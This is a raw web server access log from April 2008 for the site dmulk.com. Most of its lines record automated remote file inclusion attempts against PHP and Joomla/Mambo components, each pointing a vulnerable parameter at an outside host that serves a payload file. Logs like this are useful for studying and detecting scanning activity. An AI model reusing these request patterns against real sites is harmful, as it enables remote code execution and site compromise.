65.55.211.21 - - [29/Apr/2008:11:16:34 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.21 - - [29/Apr/2008:11:16:38 -0700] "GET /?S=A HTTP/1.1" 200 11606 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:11:16:50 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:11:16:50 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:17:07 -0700] "GET /logs/access_080214.log/index1.php?site=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:17:07 -0700] "GET /logs/access_080215.log/index1.php?site=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:11:17:23 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:17:25 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:17:25 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:11:17:33 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:11:17:33 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:11:17:33 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:11:17:47 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:11:17:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:11:17:48 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:18:00 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:18:04 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:18:04 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.21.61 - - [29/Apr/2008:11:18:06 -0700] "GET /logs/access_071230.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.151.162.98 - - [29/Apr/2008:11:18:19 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [29/Apr/2008:11:18:19 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.212.199 - - [29/Apr/2008:11:18:47 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://bajigur.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "dmulk.com"
200.254.243.74 - - [29/Apr/2008:11:18:47 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [29/Apr/2008:11:18:48 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:11:18:48 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.212.199 - - [29/Apr/2008:11:18:53 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://bajigur.net/safe.txt? HTTP/1.1" 200 11602 "-" "libwww-perl/5.808" "dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:18:55 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.230.212.199 - - [29/Apr/2008:11:18:55 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://bajigur.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "dmulk.com"
205.234.108.195 - - [29/Apr/2008:11:19:02 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.108.195 - - [29/Apr/2008:11:19:02 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.108.195 - - [29/Apr/2008:11:19:03 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:11:19:03 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:11:19:15 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:11:19:15 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:11:19:15 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.16.17.221 - - [29/Apr/2008:11:19:16 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://netbr.org/documents/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.154.155 - - [29/Apr/2008:11:19:23 -0700] "GET /logs/access_071225.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.154.155 - - [29/Apr/2008:11:19:23 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.154.155 - - [29/Apr/2008:11:19:23 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.74.155 - - [29/Apr/2008:11:19:37 -0700] "GET /blog/index.php/feed HTTP/1.1" 200 6205 "-" "Rome Client (http://tinyurl.com/64t5n) Ver: 0.9" "dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:19:48 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:19:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:20:08 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.246.51.45 - - [29/Apr/2008:11:20:09 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [29/Apr/2008:11:20:09 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:20:11 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:20:11 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:20:12 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:11:20:13 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:11:20:13 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:20:35 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.108.195 - - [29/Apr/2008:11:20:36 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:11:20:37 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:20:39 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:20:41 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:20:41 -0700] "GET /logs/access.log//main.php?sayfa=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:11:20:43 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:11:20:43 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.206.242.35 - - [29/Apr/2008:11:20:47 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [29/Apr/2008:11:20:47 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.89.199 - - [29/Apr/2008:11:21:28 -0700] "GET /logs/index.php?choix=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [29/Apr/2008:11:21:32 -0700] "GET /index.php?choix=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:21:32 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:11:21:36 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:11:21:37 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
77.221.130.3 - - [29/Apr/2008:11:21:59 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kukekaw.fileave.com/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:21:59 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:11:22:07 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:22:19 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:22:19 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.107.138.34 - - [29/Apr/2008:11:22:27 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.107.138.34 - - [29/Apr/2008:11:22:27 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:11:22:38 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:11:22:43 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:11:22:43 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:11:23:00 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:23:09 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:23:13 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:23:13 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:11:23:51 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:11:23:51 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:23:58 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:11:24:07 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.154.155 - - [29/Apr/2008:11:24:37 -0700] "GET /logs/access.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.107.184.106 - - [29/Apr/2008:11:24:41 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.184.106 - - [29/Apr/2008:11:24:46 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.184.106 - - [29/Apr/2008:11:24:46 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:11:25:13 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.254.243.74 - - [29/Apr/2008:11:25:24 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.30.216.107 - - [29/Apr/2008:11:25:29 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.230.212.199 - - [29/Apr/2008:11:25:46 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://bajigur.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "dmulk.com"
83.103.23.40 - - [29/Apr/2008:11:25:48 -0700] "GET /logs/db.php?path_local=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:11:25:49 -0700] "GET /db.php?path_local=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:26:04 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:26:08 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:26:09 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:11:26:10 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:11:26:14 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:11:26:15 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [29/Apr/2008:11:26:29 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:11:27:05 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:11:27:06 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:11:27:06 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:27:11 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [29/Apr/2008:11:27:16 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [29/Apr/2008:11:27:16 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:11:27:37 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:27:39 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:27:42 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
69.90.72.88 - - [29/Apr/2008:11:28:09 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [29/Apr/2008:11:28:09 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.216.189 - - [29/Apr/2008:11:28:11 -0700] "GET /logs/access_080120.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.216.189 - - [29/Apr/2008:11:28:12 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.216.189 - - [29/Apr/2008:11:28:12 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
